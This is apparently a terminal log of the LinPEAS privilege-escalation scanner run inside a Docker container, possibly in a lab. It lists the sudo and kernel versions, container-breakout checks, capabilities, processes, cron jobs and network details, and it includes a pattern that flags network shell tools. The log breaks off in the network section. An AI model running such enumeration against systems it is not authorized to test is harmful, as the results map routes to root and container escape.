samedit@ea41e821a96b:/tmp$ /tmp/linpeas.sh



                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------|
    |         Learn Cloud Hacking       :     https://training.hacktricks.xyz         |
    |         Follow on Twitter         :     @hacktricks_live                        |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          LinPEAS-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look into it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
  LightMagenta: Your username

 Starting LinPEAS. Caching Writable Folders...
                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                               ╚═══════════════════╝
OS: Linux version 5.15.0-119-generic (buildd@lcy02-amd64-075) (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024
User & Groups: uid=1000(samedit) gid=1000(samedit) groups=1000(samedit)
Hostname: ea41e821a96b

[-] No network discovery capabilities (fping or ping not found)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)


Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits
Linux version 5.15.0-119-generic (buildd@lcy02-amd64-075) (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024
lsb_release Not Found

╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.8.31


╔══════════╣ PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

╔══════════╣ Date & uptime
Sat Feb 21 20:33:42 UTC 2026
 20:33:42 up 544 days,  2:56,  1 user,  load average: 0.06, 0.12, 0.15

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)

╔══════════╣ Environment
╚ Any private information inside environment variables?
USER=samedit
SSH_CLIENT=10.0.240.248 62809 22
SHLVL=1
MOTD_SHOWN=pam
HOME=/home/samedit
OLDPWD=/home/samedit
SSH_TTY=/dev/pts/0
LOGNAME=samedit
_=/tmp/linpeas.sh
TERM=xterm-256color
SHELL=/bin/bash
PWD=/tmp
SSH_CONNECTION=10.0.240.248 62809 10.42.6.37 22

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ AppArmor profile? .............. docker-default (enforce)
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... enabled
═╣ User namespace? ................ enabled
═╣ unpriv_userns_clone? ........... 1
═╣ unpriv_bpf_disabled? ........... 2
═╣ Cgroup2 enabled? ............... enabled
═╣ kptr_restrict? ................. 1
═╣ dmesg_restrict? ................ 1
═╣ ptrace_scope? .................. 1
═╣ protected_symlinks? ............ /proc/sys/fs/protected_symlinks Not Found
═╣ protected_hardlinks? ........... /proc/sys/fs/protected_hardlinks Not Found
═╣ perf_event_paranoid? ........... 4
═╣ mmap_min_addr? ................. 65536
═╣ lockdown mode? ................. /sys/kernel/security/lockdown Not Found
═╣ Kernel hardening flags? ........ kernel config Not Found
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... No

╔══════════╣ Kernel Modules Information
══╣ Kernel modules with weak perms?
/lib/modules Not Found

══╣ Kernel modules loadable?
Modules can be loaded
══╣ Module signature enforcement?
Not enforced

╔══════════╣ CVE-2025-38352 - POSIX CPU timers race
═╣ Kernel release ............... 5.15.0-119-generic
═╣ Comparable version ........... 5.15.0.119
═╣ Task_work config ............. Unknown (CONFIG_POSIX_CPU_TIMERS_TASK_WORK not found)
═╣ Patch status ................. Kernel train 5.15.0.119 (verify commit f90fff1e152dedf52b932240ebbd670d83330eca manually)
═╣ CVE-2025-38352 risk .......... Unknown - missing configuration data



                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
                                   ╚═══════════╝
╔══════════╣ Container related tools present (if any):
/usr/bin/nsenter
/usr/bin/unshare
/usr/sbin/chroot

╔══════════╣ Container details
═╣ Is this a container? ........... docker
═╣ Systemd Container .............. docker═╣ Any running containers? ........ No

╔══════════╣ Docker Container details
═╣ Am I inside Docker group ....... No
═╣ Looking and enumerating Docker Sockets (if any):
═╣ Docker version ................. Not Found
═╣ Vulnerable to CVE-2019-5736 .... Not Found
═╣ Vulnerable to CVE-2019-13139 ... Not Found
═╣ Vulnerable to CVE-2021-41091 ... Not Found
═╣ Rootless Docker? ............... No


╔══════════╣ Container & breakout enumeration
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html
═╣ Container ID ................... ea41e821a96b═╣ Container Full ID .............. /
══╣ Security Mechanisms
═╣ Seccomp mode ................... filtering (2)
═╣ Seccomp filters ............... 11
═╣ AppArmor profile? .............. docker-default (enforce)
═╣ User proc namespace? ........... enabled         0          0 4294967295

  Mappings (Container -> Host -> Range):
  0 -> 0 -> 4294967295
══╣ Known Vulnerabilities
═╣ Vulnerable to CVE-2019-5021 .... No

═╣ Container escape tools present .. /usr/bin/nsenter
══╣ Runtime Vulnerabilities
══╣ Breakout via mounts
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.html
═╣ /proc mounted? ................. No
═╣ /dev mounted? .................. No
═╣ Run unshare .................... No
═╣ release_agent breakout 1........ No
═╣ release_agent breakout 2........ No
═╣ release_agent breakout 3........
═╣ core_pattern breakout .......... No
═╣ binfmt_misc breakout ........... No
═╣ uevent_helper breakout ......... No
═╣ Docker socket mounted? ......... No
═╣ Common host filesystem mounted?  /dev/md2 on /etc/hostname type ext4 (rw,relatime,stripe=32)
/dev/md2 on /etc/hosts type ext4 (rw,relatime,stripe=32)
═╣ Interesting mounts ............. overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/7J54LULA5RW3QS7JULTMMANCUZ:/var/lib/docker/overlay2/l/KEPZOCWS4XLCDORTY3LNS2CB5M:/var/lib/docker/overlay2/l/6W25BWBWERK6C4VBEYNWEU4C7U:/var/lib/docker/overlay2/l/CFXZQXQBFXXGJKTHBPBKHQKTN5:/var/lib/docker/overlay2/l/2KVJOQVTPZV6J5A34R44JV5WPH:/var/lib/docker/overlay2/l/GSVYAYLFXZNKGEGYTDD646WBHR:/var/lib/docker/overlay2/l/XOWS5QOMWXDH7AF3SZEPRXWOVY:/var/lib/docker/overlay2/l/HKZHV64DG3NMYF37G7ZW75AHZW:/var/lib/docker/overlay2/l/FDPJU4OV7F5CJ2NJVJKRQSB5F3:/var/lib/docker/overlay2/l/LVIOEZG2ITBJTTNSQEHLUBJBFT:/var/lib/docker/overlay2/l/OZRNJNO2F6L3CIEJ22Z2QHBQEQ:/var/lib/docker/overlay2/l/K4AQC4RGSIXSMOKMLRZC4RCVOX:/var/lib/docker/overlay2/l/YSNQFM77VLAQOVKHAL4GY65BKN,upperdir=/var/lib/docker/overlay2/99319b31a5125e4a76ac338b232a44295eb2b6f5133a28a095b7050d4e896074/diff,workdir=/var/lib/docker/overlay2/99319b31a5125e4a76ac338b232a44295eb2b6f5133a28a095b7050d4e896074/work)
═╣ Writable mount points ......... overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/7J54LULA5RW3QS7JULTMMANCUZ:/var/lib/docker/overlay2/l/KEPZOCWS4XLCDORTY3LNS2CB5M:/var/lib/docker/overlay2/l/6W25BWBWERK6C4VBEYNWEU4C7U:/var/lib/docker/overlay2/l/CFXZQXQBFXXGJKTHBPBKHQKTN5:/var/lib/docker/overlay2/l/2KVJOQVTPZV6J5A34R44JV5WPH:/var/lib/docker/overlay2/l/GSVYAYLFXZNKGEGYTDD646WBHR:/var/lib/docker/overlay2/l/XOWS5QOMWXDH7AF3SZEPRXWOVY:/var/lib/docker/overlay2/l/HKZHV64DG3NMYF37G7ZW75AHZW:/var/lib/docker/overlay2/l/FDPJU4OV7F5CJ2NJVJKRQSB5F3:/var/lib/docker/overlay2/l/LVIOEZG2ITBJTTNSQEHLUBJBFT:/var/lib/docker/overlay2/l/OZRNJNO2F6L3CIEJ22Z2QHBQEQ:/var/lib/docker/overlay2/l/K4AQC4RGSIXSMOKMLRZC4RCVOX:/var/lib/docker/overlay2/l/YSNQFM77VLAQOVKHAL4GY65BKN,upperdir=/var/lib/docker/overlay2/99319b31a5125e4a76ac338b232a44295eb2b6f5133a28a095b7050d4e896074/diff,workdir=/var/lib/docker/overlay2/99319b31a5125e4a76ac338b232a44295eb2b6f5133a28a095b7050d4e896074/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/md2 on /etc/hostname type ext4 (rw,relatime,stripe=32)
/dev/md2 on /etc/hosts type ext4 (rw,relatime,stripe=32)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
═╣ Shared mount points ........... ══╣ Capability Checks
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/capabilities-abuse-escape.html
═╣ Dangerous capabilities ......... CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
CapAmb: 0000000000000000
Run capsh --decode=<hex> to decode the capabilities
═╣ Ambient capabilities ........... ═╣ Dangerous syscalls allowed ... 1
══╣ Namespace Checks
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/namespaces/index.html
═╣ Current namespaces ............. total 0
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 cgroup -> 'cgroup:[4026535345]'
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 ipc -> 'ipc:[4026535285]'
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 mnt -> 'mnt:[4026535283]'
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 net -> 'net:[4026535287]'
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 pid -> 'pid:[4026535286]'
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 pid_for_children -> 'pid:[4026535286]'
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 time -> 'time:[4026531834]'
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 time_for_children -> 'time:[4026531834]'
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 user -> 'user:[4026531837]'
lrwxrwxrwx 1 samedit samedit 0 Feb 21 20:33 uts -> 'uts:[4026535284]'
═╣ Host network namespace? ........ No
═╣ Host IPC namespace? ........... No
═╣ Host PID namespace? ........... No
═╣ Host UTS namespace? ........... No
═╣ Looking and enumerating Docker Sockets (if any):
══╣ Additional Breakout Vectors
═╣ is modprobe present ............ No
═╣ DoS via panic_on_oom ........... No
═╣ DoS via panic_sys_fs ........... No
═╣ DoS via sysreq_trigger_dos ..... No
═╣ Container escape tools in PATH . /usr/bin/nsenter
══╣ Extra Breakout Vectors
═╣ /proc/config.gz readable ....... No
═╣ /proc/sched_debug readable ..... No
═╣ /proc/*/mountinfo readable ..... Yes
═╣ /sys/kernel/security present ... Yes
═╣ /sys/kernel/security writable .. No
═╣ /proc/kmsg readable ............ No
═╣ /proc/kallsyms readable ........ Yes
═╣ /proc/self/mem readable ........ No
═╣ /proc/kcore readable ........... No
═╣ /proc/kmem readable ............ No
═╣ /proc/kmem writable ............ No
═╣ /proc/mem readable ............. No
═╣ /proc/mem writable ............. No
═╣ /sys/kernel/vmcoreinfo readable  Yes
═╣ /sys/firmware/efi/vars writable  No
═╣ /sys/firmware/efi/efivars writable No
═╣ Kernel version .............. Linux ea41e821a96b 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
═╣ Kernel modules ............. /tmp/linpeas.sh: 2662: lsmod: not found
═╣ Container runtime sockets .. No
═╣ Container runtime configs .. No
══╣ Interesting Files & Mounts
═╣ Interesting files mounted ........ overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/7J54LULA5RW3QS7JULTMMANCUZ:/var/lib/docker/overlay2/l/KEPZOCWS4XLCDORTY3LNS2CB5M:/var/lib/docker/overlay2/l/6W25BWBWERK6C4VBEYNWEU4C7U:/var/lib/docker/overlay2/l/CFXZQXQBFXXGJKTHBPBKHQKTN5:/var/lib/docker/overlay2/l/2KVJOQVTPZV6J5A34R44JV5WPH:/var/lib/docker/overlay2/l/GSVYAYLFXZNKGEGYTDD646WBHR:/var/lib/docker/overlay2/l/XOWS5QOMWXDH7AF3SZEPRXWOVY:/var/lib/docker/overlay2/l/HKZHV64DG3NMYF37G7ZW75AHZW:/var/lib/docker/overlay2/l/FDPJU4OV7F5CJ2NJVJKRQSB5F3:/var/lib/docker/overlay2/l/LVIOEZG2ITBJTTNSQEHLUBJBFT:/var/lib/docker/overlay2/l/OZRNJNO2F6L3CIEJ22Z2QHBQEQ:/var/lib/docker/overlay2/l/K4AQC4RGSIXSMOKMLRZC4RCVOX:/var/lib/docker/overlay2/l/YSNQFM77VLAQOVKHAL4GY65BKN,upperdir=/var/lib/docker/overlay2/99319b31a5125e4a76ac338b232a44295eb2b6f5133a28a095b7050d4e896074/diff,workdir=/var/lib/docker/overlay2/99319b31a5125e4a76ac338b232a44295eb2b6f5133a28a095b7050d4e896074/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2 (ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/md2 on /etc/resolv.conf type ext4 (ro,relatime,stripe=32)
/dev/md2 on /etc/hostname type ext4 (rw,relatime,stripe=32)
/dev/md2 on /etc/hosts type ext4 (rw,relatime,stripe=32)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime,inode64)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/scsi type tmpfs (ro,relatime,inode64)
tmpfs on /sys/firmware type tmpfs (ro,relatime,inode64)
tmpfs on /sys/devices/virtual/powercap type tmpfs (ro,relatime,inode64)
═╣ Possible entrypoints ........... -rwxrwxr-x 1 samedit samedit 893K Feb 21 20:32 /tmp/linpeas.sh


╔══════════╣ Container - Writable bind mounts w/o nosuid (SUID persistence risk)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html#writable-bind-mounts
═╣ Writable bind mounts without nosuid ............ No


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     ╚═══════╝
Learn and practice cloud hacking techniques in https://training.hacktricks.xyz

═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM or Az metadata? ............. No
═╣ Azure APP or IDENTITY_ENDPOINT? ...... No
═╣ Azure Automation Account? ............ No
═╣ Aliyun ECS? .......................... No
═╣ Tencent CVM? ......................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes
root           1  0.0  0.0   2616   596 ?        Ss   20:19   0:00 sh -c /usr/sbin/sshd -D & ./main
samedit       49  0.0  0.0  12668  4628 ?        S    20:32   0:00      _ sshd: samedit@pts/0
samedit       50  0.0  0.0   4248  3448 pts/0    Ss   20:32   0:00          _ -bash
samedit       66  6.0  0.0   3304  2520 pts/0    S+   20:33   0:00              _ /bin/sh /tmp/linpeas.sh
samedit     1866  0.0  0.0   3304   904 pts/0    S+   20:33   0:00                  _ /bin/sh /tmp/linpeas.sh
samedit     1869  0.0  0.0   5900  2900 pts/0    R+   20:33   0:00                  |   _ ps fauxwww
samedit     1870  0.0  0.0   3304   904 pts/0    S+   20:33   0:00                  _ /bin/sh /tmp/linpeas.sh
root           8  0.0  0.0 1261196 18156 ?       Sl   20:19   0:00 ./main

╔══════════╣ Processes with unusual configurations
Process 1 (root) - sh -c /usr/sbin/sshd -D & ./main
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 7 (root) - sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 8 (root) - ./main
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 38 (root) - sshd: samedit [priv]
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 49 (samedit) - sshd: samedit@pts/0
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 50 (samedit) - -bash
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 66 (samedit) - /bin/sh /tmp/linpeas.sh
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)


╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)
mysql Not Found
postgres Not Found
redis-server Not Found
mongod Not Found
memcached Not Found
elasticsearch Not Found
jenkins Not Found
tomcat Not Found
nginx Not Found
php-fpm Not Found
supervisord Not Found
vncserver Not Found
xrdp Not Found
teamviewer Not Found

╔══════════╣ Opened Files by processes
Process 50 (samedit) - -bash
  └─ Has open files:
    └─ /dev/pts/0

╔══════════╣ Processes with memory-mapped credential files

╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information

╔══════════╣ Check for vulnerable cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
══╣ Cron jobs list
crontab Not Found
incrontab Not Found
/etc/cron.d:
total 12
drwxr-xr-x 2 root root 4096 Apr  4  2025 .
drwxr-xr-x 1 root root 4096 Feb 21 20:19 ..
-rw-r--r-- 1 root root  201 Feb 14  2020 e2scrub_all

/etc/cron.daily:
total 16
drwxr-xr-x 2 root root 4096 Apr  4  2025 .
drwxr-xr-x 1 root root 4096 Feb 21 20:19 ..
-rwxr-xr-x 1 root root 1478 Apr  9  2020 apt-compat
-rwxr-xr-x 1 root root 1187 Sep  5  2019 dpkg

══╣ Checking for specific cron jobs vulnerabilities
Checking cron directories...

╔══════════╣ System timers
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers
══╣ Active timers:
══╣ Disabled timers:
══╣ Additional timer files:

╔══════════╣ Services and Service Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services

══╣ Active services:

══╣ Disabled services:

══╣ Additional service files:
/tmp/linpeas.sh: 4441: local: /usr/sbin/sshd: bad variable name
You can't write on systemd PATH

╔══════════╣ Systemd Information
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths
═╣ Systemd version and vulnerabilities? .............. systemctl Not Found
═╣ Services running as root? ..... systemctl Not Found

═╣ Running services with dangerous capabilities? ... systemctl Not Found

═╣ Services with writable paths? . systemctl Not Found


╔══════════╣ Systemd PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths
systemctl Not Found

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets

╔══════════╣ Unix Sockets Analysis
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets

╔══════════╣ D-Bus Analysis
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus
busctl Not Found

╔══════════╣ Legacy r-commands (rsh/rlogin/rexec) and host-based trust

══╣ Listening r-services (TCP 512-514)
ss|netstat Not Found

══╣ systemd units exposing r-services
systemctl Not Found

══╣ inetd/xinetd configuration for r-services
/etc/inetd.conf Not Found
/etc/xinetd.d Not Found

══╣ Installed r-service server packages
  No related packages found via dpkg

══╣ /etc/hosts.equiv and /etc/shosts.equiv

══╣ Per-user .rhosts files
.rhosts Not Found

══╣ PAM rhosts authentication
/etc/pam.d/rlogin|rsh Not Found

══╣ SSH HostbasedAuthentication
  HostbasedAuthentication no or not set

══╣ Potential DNS control indicators (local)
  Not detected

╔══════════╣ Crontab UI (root) misconfiguration checks
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
crontab-ui Not Found


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
                              ╚═════════════════════╝
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
Network Interfaces from /proc/net/dev:
----------------------------------------
Interface: lo
  MAC: 00:00:00:00:00:00
  State: unknown

Interface: eth0
  MAC: 02:42:0a:2a:06:25
  State: up

Additional IP Information from fib_trie:
----------------------------------------
Network:
══╣ Forwarding status
net.ipv4.ip_forward = 1
net.ipv6.conf.all.forwarding = 0

╔══════════╣ Hostname, hosts and DNS
══╣ Hostname Information
System hostname: ea41e821a96b
FQDN: ea41e821a96b

══╣ Hosts File Information
Contents of /etc/hosts:
  127.0.0.1     localhost
  ::1   localhost ip6-localhost ip6-loopback
  fe00::0       ip6-localnet
  ff00::0       ip6-mcastprefix
  ff02::1       ip6-allnodes
  ff02::2       ip6-allrouters
  172.17.0.1    host
  10.42.6.37    ea41e821a96b

══╣ DNS Configuration
DNS Servers (resolv.conf):
  10.42.6.3
-e
DNS Domain Information:
(none)

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
══╣ Active tcp Ports (from /proc/net/tcp)
Proto  Recv-Q  Send-Q  Local Address          Foreign Address        State       PID/Program name
--------------------------------------------------------------------------------
tcp    00:00000000 00000000:00000000 0.0.0.0:22            0.0.0.0:0             LISTEN       /
tcp    00:00000000 00000000:00000000 127.0.0.11:36549      0.0.0.0:0             LISTEN       /

══╣ Active udp Ports (from /proc/net/udp)
Proto  Recv-Q  Send-Q  Local Address          Foreign Address        State       PID/Program name
--------------------------------------------------------------------------------

══╣ Local-only listeners (loopback)
══╣ Unique listener bind addresses
══╣ Potential local forwarders/relays
samedit     3381  0.0  0.0   3576   704 pts/0    S+   20:33   0:00 sed -E s,socat|ssh|-L|-R|-D|ncat|nc,.[1;31;103m&.[0m,g

╔══════════╣ Network Traffic Analysis Capabilities

══╣ Available Sniffing Tools
No sniffing tools found

══╣ Network Interfaces Sniffing Capabilities
Interface eth0: Not sniffable
Interface lo (loopback): Not sniffable
No sniffable interfaces found

══╣ Running sniffing/traffic reconstruction processes

╔══════════╣ Firewall Rules Analysis

══╣ Iptables Rules
iptables Not Found

══╣ Nftables Rules
nftables Not Found

══╣ Firewalld Rules
firewalld Not Found

══╣ UFW Rules
ufw Not Found

══╣ Forwarding and rp_filter
net.ipv4.ip_forward = 1
net.ipv6.conf.all.forwarding = 0
net.ipv4.conf.all.rp_filter = 1

╔══════════╣ Inetd/Xinetd Services Analysis

══╣ Inetd Services
inetd Not Found

══╣ Xinetd Services
xinetd Not Found

══╣ Running Inetd/Xinetd Services
